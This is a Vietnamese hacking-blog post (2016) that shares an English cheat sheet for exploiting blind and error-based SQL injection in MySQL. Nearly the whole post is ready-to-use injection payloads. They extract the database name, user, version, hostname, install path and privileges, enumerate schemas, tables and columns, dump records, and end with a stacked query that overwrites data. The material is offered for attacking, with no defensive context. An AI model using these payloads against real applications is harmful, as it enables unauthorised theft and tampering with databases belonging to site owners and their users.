Friday, 19 February 2016

Blind SQL Injection

   No comments


Hôm nay mình share bài viết về cách khai thác Blind SQL Injection bằng tiếng anh khá hay và đầy đủ


    1. To test blind injection
    ' and 'x'='x
    2. To select the current database (Output will be in Hexadecimal, decode to ASCII
      ' and(select 1 from(select count,concat((select (select 
concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from 
information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and '1'='1
    3. To find the current user
    1' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(user() 
as char)),0x27,0x7e)) from information_schema.tables limit 
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
    4. To find MySQL Version
    1' and(select 1 from(select 
count,concat((select (select 
concat(0x7e,0x27,Hex(cast(version() as char)),0x27,0x7e)) from 
information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and '1'='1
    5. Find current database
    1' and(select 1 from(select count,concat((select (select 
concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from 
information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and '1'='1
    6. To find the system user
    1' and(select 1 from(select count,concat((select (select 
concat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from 
information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and '1'='1
    7. To find the hostname
    1' and(select 1 from(select count,concat((select (select 
concat(0x7e,0x27,Hex(cast(@@hostname as char)),0x27,0x7e)) from 
information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and '1'='1
    8. To find the installation directory
    1' and(select 1 from(select count,concat((select (select 
concat(0x7e,0x27,Hex(cast(@@basedir as char)),0x27,0x7e)) from 
information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and '1'='1
    9. To find the DB User
    1' and(select 1 from(select count,concat((select (select (SELECT distinct 
concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM 
information_schema.user_privileges LIMIT 0,1)) from information_schema.tables 
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 
'1'='1
    10. To find the databases

    Note: Keep incrementing the n, e.g. : n, n+1, n+2, ... till you keep getting a response.

    1' and(select 1 from(select count,concat((select (select (SELECT distinct 
concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM 
information_schema.user_privileges LIMIT 1,1)) from information_schema.tables 
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 
'1'='1 

    1' and(select 1 from(select count,concat((select (select (SELECT distinct 
concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM 
information_schema.schemata LIMIT n,1)) from information_schema.tables limit 
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 

    1' and(select 1 from(select count,concat((select (select (SELECT distinct 
concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM 
information_schema.schemata LIMIT n+1,1)) from information_schema.tables limit 
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
    11. To count the number of tables in the selected database

    Note: Note this count as n
    Replace colored strings with appropriate value

    1' and(select 1 from(select count,concat((select (select (SELECT 
concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables 
WHERE table_schema=0xhex_code_of_database_name)) from information_schema.tables 
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 
'1'='1
    12. To get the table names in the selected database

    Note: m-n implies execute this query starting from m, m+1…n-1
    Replace colored strings with appropriate value

    1' and(select 1 
from(select count,concat((select (select (SELECT distinct 
concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM 
information_schema.tables Where table_schema=0xhex_code_of_database_name limit 
m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and '1'='1
    13. To get number of columns in the selected table name

    Note: Note this count as n
    Replace colored strings with appropriate value

    1' 
and(select 1 from(select count,concat((select (select (SELECT 
concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns 
WHERE table_schema=0xhex_code_of_database_name AND 
table_name=0xhex_code_of_table_name)) from information_schema.tables limit 
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
    14. To get column names of a selected table name

    Note: m-n implies execute this query starting from m, m+1…n-1
    Replace colored strings with appropriate value

    1' 
and(select 1 from(select count,concat((select (select (SELECT distinct 
concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROM 
information_schema.columns Where table_schema=0xhex_code_of_database_name AND 
table_name=0xhex_code_of_table_name limit m-n,1)) from information_schema.tables 
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 
'1'='1
    15. To count the number of records in a selected column

    Note: Remember this count as n
    1' 
and(select 1 from(select count,concat((select (select (SELECT concat(0x7e,0x27,count,0x27,0x7e) FROM `database_name`.table_name)) from 
information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and '1'='1
    16. To fetch records from a selected column

    Note: m-n implies execute this query starting from m, m+1…n-1
    Replace colored strings with appropriate value
    1' and(select 1 from(select count,concat((select (select (SELECT 
concat(0x7e,0x27,Hex(cast(table_name.column_name as char)),0x27,0x7e) FROM 
`database_name`.table_name LIMIT m-n,1) ) from information_schema.tables limit 
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
    17. Update a record in the selected column
    1';UPDATE 
table_name SET column_name=0xhex_code_of_new_record_value WHERE 
column_name=0xhex_code_of_old_record_value-- 
Ở phần trước: Error based/Double query
Phần kế tiếp: Mình sẽ viết 1 bài khá chi tiết cách khai thác lỗi SQL cho newbier

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)
 

Copyright © 2016 Security and Hacking.

Designed by :-Way2themes